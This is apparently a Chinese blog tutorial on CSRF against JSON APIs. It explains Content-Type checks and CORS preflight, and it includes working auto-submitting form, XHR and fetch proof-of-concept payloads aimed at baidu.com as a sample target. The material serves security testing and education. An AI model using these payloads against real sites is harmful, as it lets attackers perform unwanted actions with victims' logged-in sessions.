浅谈JSON格式下的CSRF

已于 2024-09-02 17:13:18 修改
阅读量1.6k 收藏 25
点赞数 42
文章标签: json csrf 前端
于 2024-06-20 18:17:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49197645/article/details/139837882
版权

前言

      最近总是遇到很多POST 传参采用 JSON 格式的场景,对于怎么验证该接口是否具有CSRF漏洞做了一些总结。

前提知识

       在一般情况下采用 Json 格式传输参数时,请求包中都有 Content-Type 头,一般服务器也会验证 Content-Type 值是否为 application/json,当服务器验证 Content-Type 时,若不符合要求,则会报错,导致传输的数据失效。

      当简单的采用表单传输简单参数时,Content-Type 值为:x-www-form-urlencoded,传输的数据会被 URL 编码,传输文件时值为:form-data
给表单添加 enctype="text/plain" 属性时,Content-type 值为:text/plain。

      如果使用 XMLHttpRequest 跨域发起请求时,浏览器首先会先进行一次 OPTIONS 预检测,检查当前域名是否支持跨域,是否在CORS白名单内。如果支持,则浏览器会进行下一步,发送真实请求,否则会直接报错。

思考、Content-Type: application/json 一般情况下为什么不会出现csrf?

 当利用json格式参数加content-type校验,其主要特点是通过json格式发送数据,而服务端限制content-type的格式只能为application/json。这种方式能防御CSRF的主要原因是:

1.在利用form表单构造post请求时,enctype属性并不支持application/json格式,浏览器在发送请求时会将content-type转为application/x-www-form-urlencoded,从而无法通过content-type限制

2.如果想要突破content-type限制,则需要设置自定义Header,此处可以利用XMLHttpRequests或js fetch,但这两种方法都无法完成跨域。因为攻击请求必须修改content-type为application/json才能绕过限制,但是这样的话会导致从而攻击请求就变成了非简单请求,这样在服务端预检请求的时候不会被通过,浏览器也就不会发送后续请求。

接下来我们来验证一下

1、如果服务端没有严格验证Content-type的情况下,可以直接构造json格式的poc

POC如下:

<!DOCTYPE html>
<html>
<head>
	<title>Json_CSRF</title>
	<meta charset="utf-8">
</head>
<body>
<form id="test" enctype="text/plain" action="http://baidu.com" method="post">
	<input name='{"title":"JSON-CSRF","content":"123erty","id":"234544","test":"' value='test"}'>
</form>
<script type="text/javascript">
	document.getElementById("test").submit();
</script>
</body>
</html>

2、如何严格验证Content-type的情况下

  •  利用js中XHR构造POC 
    <!DOCTYPE html>
<html>
<head>
	<title>Json_CSRF</title>
	<meta charset="utf-8">
</head>
<body>
<script type="text/javascript">
	function csrf(){
	      var xmlhttp = new XMLHttpRequest();
	      xmlhttp.open("POST","https://baidu.com",true);
	      xmlhttp.setRequestHeader("Content-Type","application/json;charset=UTF-8");
	      xmlhttp.withCredentials = true;
	      xmlhttp.send(JSON.stringify({"title":"Json_CSRF","content":"3tfdsa2","id":"234665"}));;
	}
	csrf();
</script>
</body>
</html>

  • 抓包分析会发现首先浏览器会发送一共OPTIONS请求进行预检,查询当前域名是否支持跨域。

  • 8e00d73a500d4adf8e8ebbbe72ab731d.png

   "预检"请求用的请求方法是OPTIONS,表示这个请求是用来询问的。头信息里面,关键字段是Origin,表示请求来自哪个源。

除了Origin字段,"预检"请求的头信息包括两个特殊字段。

(1)Access-Control-Request-Method

该字段是必须的,用来列出浏览器的CORS请求会用到哪些HTTP方法,上例是POST。

(2)Access-Control-Request-Headers

该字段是一个逗号分隔的字符串,指定浏览器CORS请求会额外发送的头信息字段,上例是content-type

如果允许跨域会返回如下信息:

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 01:15:39 GMT
Server: Apache/2.0.61 (Unix)
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, PUT
Access-Control-Allow-Headers: content-type
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Content-Length: 0
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/plain

如果不支持跨域则:

HTTP/1.1 302 Found
Bdpagetype: 3
Content-Length: 154
Content-Type: text/html
Date: Thu, 20 Jun 2024 09:55:45 GMT
Location: https://www.baidu.com/search/error.html
Server: BWS/1.1
Set-Cookie: BDSVRTM=0; path=/
Traceid: 171887734505571666029681580941251601846
X-Ua-Compatible: IE=Edge,chrome=1
X-Xss-Protection: 1;mode=block
Connection: close

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

事实上百度是不支持的。

  事实上利用js fetch构造poc和XHR是一样的效果。POC如下:

<script>
      function csrf(){
            fetch('https://baidu.com';, {method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/json;charset=UTF-8'}, body: '{"title":"JSON-CSRF","content":"2345hgfds","id":"23456543"}'});
      }
      csrf();
</script>

    总结:只有允许跨域的情况下才能实现json格式下的csrf,否则就是能绕过cors。因为在json格式下,如果服务端没有严格校验Content-Type时,可以构造poc直接进行利用,如果是严格校验Content-Type为json时,如果利用XHR设置格式为json进行跨域在服务器设置了cors的情况下会先进行options预检,服务器会检查当前域名是否在白名单内,如果在就正常发送XMLHttpRequest请求如果不在就报错。

 所以json格式下的CSRF产生只有两种情况:

 1、没有严格校验Content-Type。

 2、在存在CORS漏洞的前提下进行利用。

Georgeh1
关注
浅谈CSRF跨域读取型漏洞之JSONP劫持
记录学习,一起进步
03-06 1020
CSRF跨域读取型漏洞之JSONP劫持
浅谈XSS和CSRF
i李泳谦谦谦谦谦
07-08 9340
浅谈XSS与CSRF一、XSS二、CSRF 一、XSS 1.什么是XSS攻击 XSS也叫CSS,是Cross Site Script的简称,为了和CSS(样式)区分开来,所以改名为XSS。XSS是web常见的攻击手段之一,是通过向目标网站注入可执行的恶意代码,以达到攻击的目的。黑客能够通过XSS攻击,窃取用户的信息想要进行XSS攻击,盗取用户的登陆凭证发起CSRF攻击。想要达到XSS攻击必须达到两...
浅谈JWT(Json Web Token)
lans_g的博客
08-30 595
JWT,在HTTP通信过程中,进行身份认证。它是一种开放标准,一种规范化之后的 JSON 结构的 Token。JWT 自身包含了身份验证所需要的所有信息,因此我们的服务器不需要存储 Session 信息。增加了系统的可用性和伸缩性,大大减轻了服务端的压力。...
浅谈 XSS & CSRF
10-03 139
客户端(浏览器)安全 同源策略(Same Origin Policy) 同源策略阻止从一个源加载的文档或脚本获取或设置另一个源加载的文档的属性。 如: 不能通过Ajax获取另一个源的数据; JavaScript不能访问页面中iframe加载的跨域资源。 对 http://store.company.com/dir/page.html 同源...
浅谈json web token及应用
技术宅,专注云原生、Go、Linux、Java等技术分享,原创文章、效率工具、实战解决方案!关注我,了解互联网动态,学 IT 不迷路
10-18 356
Json Web Token (JWT),是一个非常轻巧的规范,这个规范允许在网络应用环境间客户端和服务器间较安全的传递信息。该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源。 在web应用中,我们提供的API接口,通过GET或者POST方式调用,在调用过程中,就...
浅谈同源策略漏洞及XSSCSRF
actistsec的博客
10-21 925
跨域漏洞/XSS/CSRF在蜜罐上也有相应利用点
浅谈CSRF漏洞
weixin_30297281的博客
04-21 106
前言: 看完小迪老师的CSRF漏洞讲解。感觉不行 就自己百度学习。这是总结出来的。 歌曲: 正文: CSRF与xss和像,但是两个是完全不一样的东西。 xss攻击(跨站脚本攻击)储存型的XSS由攻击者和受害者一同完成。xss详细介绍:点我跳转 CSRF(跨站脚本伪造)完全由受害者完成。攻击者不参与其中。CSRF详细介绍:点我跳转 CSRF原理: 银行...
浅谈 XSS & CSRF(转)
weixin_30384031的博客
07-23 122
浅谈 XSS & CSRF 客户端(浏览器)安全 同源策略(Same Origin Policy) 同源策略阻止从一个源加载的文档或脚本获取或设置另一个源加载的文档的属性。 如: 不能通过Ajax获取另一个源的数据; JavaScript不能访问页面中iframe加载的跨域资源。 对 http://store.company...
浅谈JWT(Json Web Token认证机制)
chenxiao17301的博客
07-05 542
JWT在用户注册或登录后,我们想记录用户的登录状态,或者为用户创建身份认证的凭证。我们不再使用Session认证机制,而使用Json Web Token认证机制。什么是JWTJson web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一...
浅谈Django前端后端值传递问题
09-16
当需要将数据以JSON格式发送给前端时,可以使用`HttpResponse`或`JsonResponse`类: ```python from django.http import JsonResponse def select_art(request): query = request.GET.get('query') results = ...
【ASP.NET编程知识】浅谈ASP.NET Core中间件实现分布式 Session.docx
05-21
默认情况下,ASP.NET Core 使用 JSON 序列化,但在某些场景下,如处理大量数据时,可以考虑使用其他高效的序列化库,如 Protobuf 或 MessagePack。 1.5. 安全性 在使用分布式 Session 时,要确保数据加密,避免敏感...
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 2853
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
浅谈springboot
asdsa_df的博客
04-28 832
首先,Spring Boot 提供了对 Flyway 的开箱即用支持,这意味着当你在项目中引入 Flyway 相关依赖时,Spring Boot 会自动进行配置和集成。通过上述步骤,Spring Boot 与 Flyway 的整合可以帮助你实现数据库的版本控制和自动化迁移,确保在不同环境中数据库结构的一致性,提高开发效率和减少人为错误。总之,对于正在使用或计划升级到Spring Boot 3.0的开发者来说,了解这些变更是非常重要的,以确保应用程序能够顺利迁移到新版本,并避免潜在的兼容性问题。
30-手动准备地图包
搬砖人的自我修养
11-08 507
Carla教程
Ubuntu16.04安装并配置Visual Studio调试C++
qq_41496108的博客
11-09 399
Ubuntu16.04安装并配置Visual Studio调试C++
bert-base-uncased使用
m0_56065966的博客
11-09 475
轻松学习bert-base-uncased使用
[FBCTF 2019]rceservice 详细题解
weixin_73904941的博客
11-09 1380
如果在字符串最末尾的 } 之前加上一个%0a {%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}此时 \x00-\x1F 匹配了第一个%0a 但是最后的.* 不能匹配换行符,也匹配不到换行后的 }所以不能遍历完整字符串,返回值为空,完成正则绕过//而在单行模式下$ 似乎会忽略在句尾的 %0a 所以如果%0a 添加在字符串最后的} 的后面的话依然会被匹配构造?
大模型落地之ollama控制设备
最新发布
weixin_44772948的博客
11-10 91
本地环境:ollama3.2(理论上ollama3.1以上就支持tool功能,但是笔者没有试过)(PS:不足点,在输入不是控制指令的相关问题时,大概率也会调用工具,需要后续调优)
GPU集群上分布式训练大模型
jkjgj的博客
11-07 1041
总结一下如何在超算系统上进行预训练大模型的分布式训练 / 微调,文中代码已上传至。
json格式CSRF如何防御
04-14
CSRF攻击是指攻击者利用受害者的登录态,在受害者不知情的情况下,向网站发送恶意请求,从而实现攻击目的。防范CSRF攻击的一种有效手段就是使用同步令牌(Synchronizer Token)。 在每次需要提交表单时,服务器会生成一个随机的token,并将此token插入到表单中。当表单提交后,服务器会校验这个token是否合法,从而确保此次请求是否为受信任来源。对于Json格式CSRF,可以在HTTP请求头中添加X-CSRF-TOKEN来传递token值,另外,使用HttpOnly和Secure标识,防止token被窃取。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值